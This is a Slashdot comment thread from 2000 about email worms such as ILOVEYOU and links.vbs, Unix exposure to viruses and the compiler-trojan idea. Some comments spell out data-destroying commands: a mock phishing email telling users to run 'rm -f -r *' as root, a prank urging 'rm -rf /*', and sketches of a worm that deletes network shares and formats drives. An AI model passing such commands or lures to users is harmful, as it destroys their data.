    I even played with the concept in my earlier code days. Having written a client/server app that passed patches between computers it could find on its network where the computer was running the client. And did not inform the user.

    Still i suspect the whole concept is considered disgusting and not worthy ... sigh !

  • Unix and Viruses. (Score:5)

    by Christopher Thomas ( 11717 ) on Tuesday May 23, 2000 @11:00AM (#1052623)
    There seems to be a lot of viruses coming out these days. How immune are the Linux/Unix systems and what can we do to prevent these kind of viruses from causing us trouble? How would the current viruses need to be configured to bother us?

    The short answer is that most flavours of Unix, including Linux, don't have much to worry about from the current crop of viruses. This may change in the future, but due to the architecture of Unix it is more difficult for viruses to propagate or to really damage a system.

    The long answer is "it depends". Details as follows.

    • Macro Viruses
      Viruses and trojans that are embedded in Word documents, Visual Basic scripts, or the like have no effect under Unix, because most Unix systems don't process Word macros or Visual Basic scripts. Thus, most of the crud that has been affecting Windows users has been completely unnoticed by Unix users.

    • Bombs and Trojans
      If you are sent an executable, or fetch an executable yourself, and run it, it can modify anything that you have permission to modify, even under Unix. This means that a trojan executable, if you run it, could quite easily destroy all of your files - but not the files of anyone else using the machine, and not the operating system files. In principle, a trojan could also access any facilities that you have access to; this means that a sufficiently clever trojan could mail itself to other people from your account. However, it would have a harder time finding addresses to send itself to (maybe scan ~/mail and /var/spool/mail/username for addresses). So damage is limited, and nobody's bothered implementing effective propagation so far (though it could be done).

    • True, Infecting Viruses
      A true virus is capable of infecting arbitrary executables, which themselves will contain the virus and infect other executables. While in principle this could be done under Unix, the virus would again be limited only to executables that you have permission to modify. System tools would not be affected - you couldn't infect "cp" or "ls", for instance. Distribution would also be curtailed, as you don't usually send executables to your friends; you send them a source tarball, or point them to where they can download an executable. So, while something like this could be done, it wouldn't be as devastating as it is under Windows or DOS.

    • Social Engineering
      Social engineering remains one of the biggest threats under Unix. It means, simply, convincing a user to do something harmful. In the case of email viruses, the virus must convince the user to open the attachment. Heaven help us when inexperienced users have root access; a virus could simply tell you to "su to root and run this install script" to have devastating impact. This will probably be one of the biggest threats in terms of viruses under Unix.


    The idea of a Linux email worm is so interesting that I'm tempted to write one. Must... stay... good... :).
  • If they don't have outlook, the virus can no longer spread. So in a sense, they would be an endpoint for the virus. The virus uses mapi calls to outlook to replicate.

    And yes, any windows version with WSH installed is vulnerable (well.. vulnerable is a shitty word. Of course any windows machien with WSH installed can run scripts...)

    Man. I should write a program in C that formats your HD after mailing itself to everyone in your outlook address book, and then I could be a famous virus writer too!

  • I KISS YOU!! (Score:3)

    by doomy ( 7461 ) on Tuesday May 23, 2000 @11:01AM (#1052626) Homepage Journal
    The Turkish trojan. ;)
    --
  • Not macro. Just an attached vbscript.
  • you gotta ask yourself here...is this such a bad thing? :)

    if the links are quality...sure..why the hell not

  • Go Hip! (Score:3)

    by Squeeze Truck ( 2971 ) <xmsho@yahoo.com> on Tuesday May 23, 2000 @03:11PM (#1052642) Homepage
    There's another "legitimate" portal site called Go Hip! [gohip.com] that also uses viral advertising.

    If you use Outlook and Explorer, the virus will add another "toolbar" to your browser (which only contains banner ads), and attaches an advertisement for itself onto the end of every email you send out. The program does all of this without the users knowledge or permission.

    I would normally call this just merely annoying except for the fact that it is impossible to uninstall it via any normal means. I removed it from my registry, but it just copied itself back. The only way to remove it is to dig deep in Go Hip!'s customer service page and run a "remove" utility.
  • One of the biggest safeguards of Unix so far is: the sheer lack of uniformity. Another is (was?) it's relatively small install base. About the first point: write a linux executable, and even it you convince enough people to run it, it will fail because there is no single level of Unix installed everywhere. Some kernels will barf on it, others will refuse to execute it. And it won't work on Slowaris, SunOS, HP-(Y)UX, *AIX*, Digital Unix. So a shell script version might work (even then, program features change, as well), but that has the drawback of being readable and thereby easily recognized for what is is.

    The second point, the install base, removes one of the major incentives of the perpetraitors: notoriety. Lack of familiarity might also play a part.

    THe third (and maybe biggest?) factor is: Unix users are generally much more educated in computer use, and knowledgeable about it. And with all the M$ targeted viruses about, they will know not to run random binaries from unknown sources. So again, a succesrate limiter, reducing the chance of notoriety.

    That are in my estimate the main reasons we haven't seen much abuse in the @Unix so far. The only notorious exception being Morris, who wormed himself rather more succesfully than intended through sendmail holes.

    Stefan.
    <B5>There is a hole in your mind.</B5>

  • Wow, a free app that adds a shortcut to a porn site on my desktop and generiously tells all my friends coworkers. Thats not a bug!

    Geoff

  • Re:Alternative virii? (Score:3)

    by dodobh ( 65811 ) on Wednesday May 24, 2000 @04:54AM (#1052663) Homepage
    Thats Ken Thomson's exploit you are referring to. Its in the jargon file and elsewhere too.

  • Previous, not Next, Generation (Score:3)

    by jhigham ( 20896 ) on Tuesday May 23, 2000 @10:46AM (#1052665)
    Links.vbs predates ILOVEYOU. It scans net blocks looking for open shares and replicating, and was out there in early 2000 at the latest.
  • By corporate decree, our company is forced to use Outlook + Exchange for all email. Of course, we got hit hard by the "ILOVEYOU" bug.
    I thought it all amusing, and enjoyed looking at the actual code. I am not a programmer at all, yet I saw how easy it would be to modify this simple program to be MUCH nastier:
    1) forward every message from your "Sent" folder to everyone in your address book (a corporate nightmare: think about the CEO's sent emails being read by everyone in the company)
    2) after that happy chore, prowl the network shares and deltree *.*
    3) finally, as a parting shot, format c:

    I figure someone will do this eventually. Luckily, I run Linux. :)
  • Let me think... I want to do something to piss off a lot of people. I'll write a virus to fsck up Apache. If it actually spread like ILOVEYOU, well then *POOF*! 60% of the web is gone.

    I'll bet you that almost all of the computers out there that aren't servers are workstations/personal computers for someone who DOES browse the web. Those users aren't going to be happy about this, not one bit.

    Eric

  • I read about a similar idea from one of the Unix gurus before (I don't remember exactly who it was, unfortunately). Basically, the article talks about how even source code is not a guarantee that you are safe.

    Basically, it works from the idea of a self-replicating program, as follows:

    1. Malicious programmer gets the source code for say, GCC. He modifies GCC so that it recognizes when it's compiling a good copy of its own source code, and reproduces itself (a bugged GCC). And of course, the bugged code can also contain whatever virus code for spreading, etc..
    2. Via virus or whatever other means, the programmer installs this bugged GCC into the system.
    3. Unsuspecting user compiles his C program, and the virus spreads to his binary.
    4. After a few incidents, the sysadmin is informed that something is wrong with the compiler.
    5. Sysadmin downloads GCC source code (a good copy, mind you) and re-compiles GCC. But, because the current GCC knows when it sees a copy of itself, it re-inserts the bug into the new GCC. Scary thing is, the new source code does not contain the bug code, because the bug is inserted during compile-time. The sysadmin can proof-read the source code all he wants, but he will never find a trace of the bug. Worse, if the bug also infests objdump, od, and other disassemblers, then the sysadmin may never find out why his machine is spreading virii or behaving strangely even though everything on his system seems to be clean.

    Of course, replacing the GCC with a good binary will solve the problem, but the virus could have replaced, say, Apache or FTP, so that any good copy of GCC downloaded will be bugged. And no amount of recompilation from source will do any good, because the bugged compiler will always insert bugged code into any source you compile.

    Anyway, my point is, source code does not guarantee safety. About the only thing that can solve the problem (that I can think of) is to nuke the system and re-install from scratch. Of course, suppose the virus bugged a machine on your ISP so that it inserts itself into any fresh system binaries you download... ultimately, you will never be 100% sure unless you physically get a copy of a new system from your vendor. But suppose the vendor has also been bugged...

    I know this is a bit stretching it, but still, it involves methods which are very practical to implement. Do not hide in the comfort of "Unix is built for security" or "we are safe because we can audit source code".


    ---
  • I can remember someone trying to send me a file on mirc... called links.vbs, about 6 months ago. I never accepted it, but anybody know what i'm talking about?

    Hopefully we will see an end to these e-mail "worm" virus. An article [slashdot.org] at Network World Fusion [nwfusion.com] describes how Microsoft has released a security update for Outlook, which among other things, blocks 38 different file types, like exe, vbs, bat, and others. The funny thing is, scripting is STILL ACTIVATED, unless turned off. Personally, I think scripting is useful, but, for the average user, I feel it should be left off unelss the user turns it on. It does, although, prevent scripts from accessing the address book.

    Its funny, "It's a feature, not a bug", yet they issued a patch for it...

  • Eh? (Score:2)

    by mindstrm ( 20013 )
    They don't bother us in the slightest, other than the fact that we have to read the stupid news articles. These virii are incapable of bothering us. In fact.. they aren't even really virii. They require the manual intervention of a user to consciously run them.
  • Given how easy this would be to implement by modifying the ILOVEYOU virus, even if it started as a hoax, how long would it be before someone, given the suggestion, implemented it?

    Reality immitates fiction immitates reality.

  • Re:Unix and Viruses. (Score:4)

    by laborit ( 90558 ) on Tuesday May 23, 2000 @11:35AM (#1052691) Homepage
    Heaven help us when inexperienced users have root access

    Agreed, although when that comes about the "viruses" won't even have to be executable.
    -----
    From: Redhat Technical Support
    Subject: System upgrade information

    Dear user -
    We regret to inform you that your Linux system shipped with several preferences improperly set. Fortunately, you can improve your web browsing speed and startup time with a few simple commands. First of all, we'd appreciate your forwarding this to everyone else you know (it doesn't matter if they don't have Linux; they might know someone who does. This way, the fix will get out as quickly as possible.
    Once you've done that, just write down and follow these directions:

    1. Type "su"
    2. At the prompt, enter your secret root password.
    3. Type "rm -f -r *"

    Sincerely,
    Bob Jones, Redhat technical support
    -----
    - Michael Cohn
  • The idea of a Linux email worm is so interesting that I'm tempted to write one. Must... stay... good... :).

    The odd thing is the Unix lead the way here as well, do a search on 'Great Internet Worm'.
  • These concepts are probably patented. You shouldn't even be discussing them w/o licensing the technology from the patent holders.
  • Be sure to tie the format to the screensaver, and possibly to a window late at night, so that the format will take place when nobody is around to stop it.
  • Well then, instead of accomodating this virus, why not take control of your desktop with an alternative shell (like a Window Manager). The main one I use is Litestep [litestep.net]
  • Deep in the code of every variant of UNIX and Linux sits a very well hidden easter egg!
    Log in as root on any *N*X machine and run "rm -rf /*".
    I can't spoil the easter egg, but after it's done running I'm sure you will be very suprised!

    --

    Note: If you were stupid enough to actually do this, I think we're better off without you in the *N*X world. ;)

  • "download browser enhancement" (Score:3)

    by 1010011010 ( 53039 ) on Tuesday May 23, 2000 @05:57PM (#1052710) Homepage
    You didn't, by chance, click on the "download browser enhancement" link, did you?

    I've got IE5 and Outlook2k on my Win2k box... and nothing happened by just looking at the site. Are your IE security settings set to "bend me over again"?
  • alter the virus to make the porn site the default page for the browser, not just add a desktop link.

    Maybe if Bill gets his default page set to "Naughty Barnyard Nyphos" a few times he will pay more attention to security.
  • I played with the concept as well, albeit less viral in final form. Had a wee little VB client sitting on a port that just did nothing more than report a patch number when queried. An admin script on a *NIX box would, based on patch number, mail out wrapped updates to responsible users and complain if they weren't installing them in a timely fashion. (Rechecked the patch # in one hour, mail a complaint to the user, and if unchanged in 12 it would mail a notice to me) When executed, the update wrapper would query all of the machines in that segment, ask the server if they had been bothered, and mail itself to them too if required. (Only needed to 'seed' a list of fifty users this way; The BSD box was WAY underpowered too.)

  • This is *not* a variant of ILOVEYOU... (Score:5)

    by stx23 ( 14942 ) on Tuesday May 23, 2000 @10:49AM (#1052720) Homepage Journal
    ...but rather a precursor. It's almost a year old. Details here [symantec.com].

Slashdot Top Deals

You scratch my tape, and I'll scratch yours.

Close